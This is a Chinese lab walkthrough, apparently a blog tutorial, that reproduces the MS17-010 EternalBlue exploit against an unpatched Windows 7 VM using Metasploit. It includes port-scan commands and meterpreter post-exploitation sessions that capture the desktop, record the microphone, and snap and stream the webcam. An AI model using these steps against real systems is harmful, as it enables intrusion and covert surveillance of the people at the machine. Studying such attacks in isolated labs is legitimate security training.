永恒之蓝 MS17-010

WIN7系统永恒之蓝漏洞

前章:

安全漏洞的分析与利用

PTES渗透测试执行标准

1.简介

永恒之蓝:是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 // 该词条来自于百度百科

2.漏洞复现

平台搭建-环境部署:

  • 基于vmware workstation 12 pro
  • kali linux
  • window 7 x64位 (未打MS17-010补丁)
  • kali linux与win7靶机在同一网段

(1).漏洞信息收集

首先,进入Metasploit的msf终端
msf终端是Metasploit框架中最强大、最丰富且支持最好的用户接口

  • 使用Metasploit自带的nmap工具对靶机进行扫描
    在这里插入图片描述
    我们发现其主机的445端口是打开的,可能存在永恒之蓝漏洞。
  • 使用AUX辅助模块,扫描目标靶机
    当前使用的为auxiliary(scanner/portscan/tcp)
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options 
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.129
RHOSTS => 10.10.10.129
msf5 auxiliary(scanner/portscan/tcp) > set ports 1-1000
ports => 1-1000
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/tcp) > exploit 

在这里插入图片描述
我们可以看到我们针对于10.10.10.129主机1-1000端口,TCP的135、139、445端口都打开

(2).渗透攻击阶段

  • 使用ms17-010模块
    在这里插入图片描述
  • 使用ms17-010的aux模块再次对10.10.10.129主机进行扫描,发现该主机445端口很可能通过MS17-010进行攻击
    在这里插入图片描述
    使用ms17-010 exploit攻击模块进行攻击
    在这里插入图片描述
    攻击成功,进入windows系统,且权限为最高系统权限system32>
    在这里插入图片描述

(3).后渗透攻击阶段

  • 设置攻击载荷(payloads)
    当前使用的为 windows/x64/meterpreter/reverse_tcp
    在这里插入图片描述
  • 攻击成功后,我们会进入到meterpreter后门工具中
    merterpreter: 可以看做一个支持多操作系统平台,可以驻留在内存并具备免杀功能的高级后门程序

meterpreter的功能:

  • 1.特权提升
  • 2.信息获取
  • 3.系统监控
  • 4.跳板攻击
  • 5.内网拓展等
    在这里插入图片描述
  • 接下来我们针对于129主机,进行后渗透中的截屏系统监控录音的获取
screenshot - 截屏
meterpreter > screenshot //截屏,默认存储在家目录下
Screenshot saved to: /root/bnalpAZM.jpeg

meterpreter > screenshot -h
Usage: screenshot [options]

Grab a screenshot of the current interactive desktop.

OPTIONS:

    -h        Help Banner.
    -p <opt>  The JPEG image path (Default: 'gjFcDUjx.jpeg') //定义截屏存储路径
    -q <opt>  The JPEG image quality (Default: '50') //定义像素
    -v <opt>  Automatically view the JPEG image (Default: 'false') //自动查看截屏、默认关闭

meterpreter > 

在这里插入图片描述
在这里插入图片描述

record_mic录音
meterpreter > record_mic -d 3 -p false
[*] Starting...
[*] Stopped
Audio saved to: /root/UOzQKTfF.wav

meterpreter > 

meterpreter > record_mic -h
Usage: record_mic [options]

Records audio from the default microphone.

OPTIONS:

    -d <opt>  Number of seconds to record (Default: 1) //定义录音时间长短,默认为1秒
    -f <opt>  The wav file path (Default: '/root/[randomname].wav') //定义录音文件存储路径,默认为家目录下
    -h        Help Banner
    -p <opt>  Automatically play the captured audio (Default: 'true') //自动播放捕获的音频

meterpreter > 

在这里插入图片描述
在这里插入图片描述

meterpreter中的Webcam commands-摄像头命令

在这里插入图片描述

  • webcam_chat:开始一个视频聊天
  • webcam_list:扫描摄像头设备
  • webcam_snap:从指定的摄像头获取快照
  • webcam_stream:从指定的摄像头播放视频流
meterpreter > webcam_list
1: USB2.0 VGA UVC WebCam

扫描摄像头设备:
在这里插入图片描述
拍取快照,抓拍摄像头:

meterpreter > webcam_snap -p /root/snap.jpeg -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/snap.jpeg

meterpreter > webcam_snap -h
Usage: webcam_snap [options]

Grab a frame from the specified webcam.

OPTIONS:

    -h        Help Banner
    -i <opt>  The index of the webcam to use (Default: 1) //摄像头索引
    -p <opt>  The JPEG image path (Default: 'McrshoXs.jpeg') //快照存储路径
    -q <opt>  The JPEG image quality (Default: '50') //像素默认50
    -v <opt>  Automatically view the JPEG image (Default: 'true') //默认自动打开快照

从摄像头中截取的快照图片
在这里插入图片描述
打开视频监控:

meterpreter > webcam_stream -h
[*] Starting...
Usage: webcam_stream [options]

Stream from the specified webcam.

OPTIONS:

    -d <opt>  The stream duration in seconds (Default: 1800) //视频流持续时间,默认1800秒
    -h        Help Banner
    -i <opt>  The index of the webcam to use (Default: 1) //摄像头索引
    -q <opt>  The stream quality (Default: '50') //视频流像素
    -s <opt>  The stream file path (Default: 'YCKFILwE.jpeg') //视频流存储路径
    -t <opt>  The stream player path (Default: gZAbKWbt.html) // 视频流访问路径
    -v <opt>  Automatically view the stream (Default: 'true') // 自动打开视频,默认开启

meterpreter > 

在这里插入图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章